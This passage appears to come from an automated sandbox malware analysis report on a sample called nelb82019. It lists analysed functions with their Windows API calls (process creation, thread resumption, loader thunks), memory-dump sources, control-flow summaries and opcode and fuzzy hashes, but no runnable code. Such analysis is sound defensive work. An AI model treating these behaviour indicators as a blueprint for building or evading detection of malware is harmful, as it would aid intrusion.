                                                                                • Instruction ID: 2768368b88a5de6db58a5a8ff78ca0bf066aeaf8c33bf2dedb31e54fdb68906b
                                                                                • Opcode Fuzzy Hash: 58298f0ceb02356585628daae36302fa3ae09f565c4ede60c7bccd4bf7feaa06
                                                                                • Instruction Fuzzy Hash: 9731BAB5D112589FCF14CFAAD884AEEFBF1AF49314F24842AE414B7240C778AA49CF54
                                                                                Function 00244FE3 Relevance: 1.6, APIs: 1, Instructions: 79processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1066 244fe3-244ffc CreateProcessW 1067 245005-2450c4 1066->1067 1068 244ffe-245004 1066->1068 1078 2450c6-2450ef 1067->1078 1079 2450fa-245105 1067->1079 1068->1067 1078->1079
                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00244FE9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: 90476b4a926e40a41f298359e56bf4ed20e8d231fc71f85fbe057fae88f97cdb
                                                                                • Instruction ID: c5a2f1b6a53fbb83abe198da6d3fabe85c1264a13cc90c6c1bb6fcf6bcad8030
                                                                                • Opcode Fuzzy Hash: 90476b4a926e40a41f298359e56bf4ed20e8d231fc71f85fbe057fae88f97cdb
                                                                                • Instruction Fuzzy Hash: 58213970800229CBEB65DF68C950BDEBBB1AF01304F2091EAC10DB7261DA749E89CF61
                                                                                Function 00244130 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1083 244130-2441c6 ResumeThread 1087 2441cf-244211 1083->1087 1088 2441c8-2441ce 1083->1088 1088->1087
                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 002441B6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 5d2370956d0eaab5f0c2c1371cad16eb07a455eef152a2d8dc93675d8ebd5261
                                                                                • Instruction ID: 8c25e5f7dafd2e2d1187601172333cb813cbede71f9ea867e2950f32bfd54fea
                                                                                • Opcode Fuzzy Hash: 5d2370956d0eaab5f0c2c1371cad16eb07a455eef152a2d8dc93675d8ebd5261
                                                                                • Instruction Fuzzy Hash: 1D31BCB4D102189FCF14CFA9D984AAEFBB5EF49314F14942AE819B7310C734A945CF54
                                                                                Function 00244138 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ResumeThread.KERNELBASE(?), ref: 002441B6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 59ff2710d2b37c0dd7604545a2c28b0e50d9eec6c8b59f275edbf200fb774597
                                                                                • Instruction ID: f160efdf565add8c84bd0d1fea6bd85c1d160b87602071c7c818cc64c204edf3
                                                                                • Opcode Fuzzy Hash: 59ff2710d2b37c0dd7604545a2c28b0e50d9eec6c8b59f275edbf200fb774597
                                                                                • Instruction Fuzzy Hash: 9631CCB4D102189FCF14CFA9E884AAEFBB5AF49314F10942AE819B7300C734A945CF94
                                                                                Function 0013D1E8 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400372671.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_13d000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 67d6b7a54f5ad6bd5d00deb8669858e725b9db8a3e2d2df6a1554c1b6a6ede0a
                                                                                • Instruction ID: 6f8c567f066d3c175ab71428506efd877258320f7dab4185b0fa066874534223
                                                                                • Opcode Fuzzy Hash: 67d6b7a54f5ad6bd5d00deb8669858e725b9db8a3e2d2df6a1554c1b6a6ede0a
                                                                                • Instruction Fuzzy Hash: AF21FFB5604340EFDB05CF24F8C4B26BBA5EB84314F24C9A9E8094B246C376D84ACBA1
                                                                                Function 0013D01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400372671.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_13d000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                                                • Instruction ID: 4d967bc66fc9d1a25c83f1b7f0c5bf5a08a76d64203610675017b6464fe62645
                                                                                • Opcode Fuzzy Hash: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                                                • Instruction Fuzzy Hash: 8721B0B5604240EFDB19CF24F8C4B26BB65EB84B14F34C5A9E8494B256C736D84BCBA1
                                                                                Function 0013D006 Relevance: .1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400372671.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_13d000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                                                • Instruction ID: c93a144368a3656922636856f90339f43b112a12ea4bafa1108d28c1e8bd612a
                                                                                • Opcode Fuzzy Hash: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                                                • Instruction Fuzzy Hash: 502171755083809FCB06CF14E994711BF71EB46714F28C5DAD8498F266C33AD85ACB62
                                                                                Function 0013D1E3 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400372671.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_13d000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                • Instruction ID: 0037e1be801d687b0eeef2467f8055ee626e754beee274f268e722d8135f06d1
                                                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                • Instruction Fuzzy Hash: E9119D75504280DFDB02CF54E5C4B16BFA1FB84314F28C6AED8494B656C33AD85ACBA1

                                                                                Execution Graph

                                                                                Execution Coverage:0.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:33.3%
                                                                                Total number of Nodes:6
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 65634 976c39 65635 976c45 __except1 65634->65635 65637 97ee06 __ultow_s 65635->65637 65639 91fea0 LdrInitializeThunk 65635->65639 65638 976c66 __except1 65639->65638 65640 91f900 LdrInitializeThunk

                                                                                Executed Functions

                                                                                Function 009200C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                Function 00920048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 13 920048-92005d LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                Function 00920078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 14 920078-920090 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                Function 0091F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1 91f9f0-91fa05 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                Function 0091F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 91f900-91f918 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                Function 0091FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2 91fad0-91fae5 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                Function 0091FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3 91fae8-91fafd LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                Function 0091FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 91fbb8-91fbcd LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                Function 0091FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 4 91fb68-91fb7d LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                Function 0091FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 7 91fc90-91fca5 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                Function 0091FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 6 91fc60-91fc75 LdrInitializeThunk
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                • Associated: 0000000B.00000002.410976071.0000000000900000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A04000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A07000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000B.00000002.410976071.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_900000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
